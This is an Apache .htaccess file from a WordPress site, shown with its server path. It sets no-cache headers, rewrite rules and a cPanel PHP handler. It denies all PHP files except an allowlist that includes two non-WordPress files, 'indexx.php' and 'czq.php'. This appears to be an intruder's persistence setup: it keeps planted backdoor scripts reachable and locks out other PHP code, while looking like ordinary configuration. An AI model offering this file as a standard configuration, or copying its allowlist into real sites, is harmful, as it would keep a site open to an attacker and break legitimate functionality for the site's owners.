File: /home/msgdhg02/www/godkingkong24hr.com/.htaccess
<IfModule mod_headers.c>
Header set Cache-Control "no-cache, no-store, must-revalidate"
Header set Pragma "no-cache"
Header set Expires 0
</IfModule>
<IfModule mod_authz_core.c>
<FilesMatch "\.php$">
Require all denied
</FilesMatch>
<FilesMatch "^(index\.php|indexx\.php|czq\.php|wp-comments-post\.php|wp-cron\.php|wp-login\.php|wp-signup\.php|wp-sitemap\.php|xmlrpc\.php)$">
Require all granted
</FilesMatch>
</IfModule>
<IfModule !mod_authz_core.c>
<FilesMatch "\.php$">
Order Deny,Allow
Deny from all
</FilesMatch>
<Files "^(index\.php|indexx\.php|czq\.php|wp-comments-post\.php|wp-cron\.php|wp-login\.php|wp-signup\.php|wp-sitemap\.php|xmlrpc\.php)$">
Order Allow,Deny
Allow from all
</Files>
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# BEGIN FRedirect_ErrorDocument
# The directives (lines) between "BEGIN FRedirect_ErrorDocument" and "END FRedirect_ErrorDocument" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.
ErrorDocument 404 /index.php?error=404
# END FRedirect_ErrorDocument
# php -- BEGIN cPanel-generated handler, do not edit
# Set the “ea-php81” package as the default “PHP” programming language.
<IfModule mime_module>
AddHandler application/x-httpd-ea-php81 .php .php8 .phtml
</IfModule>
# php -- END cPanel-generated handler, do not edit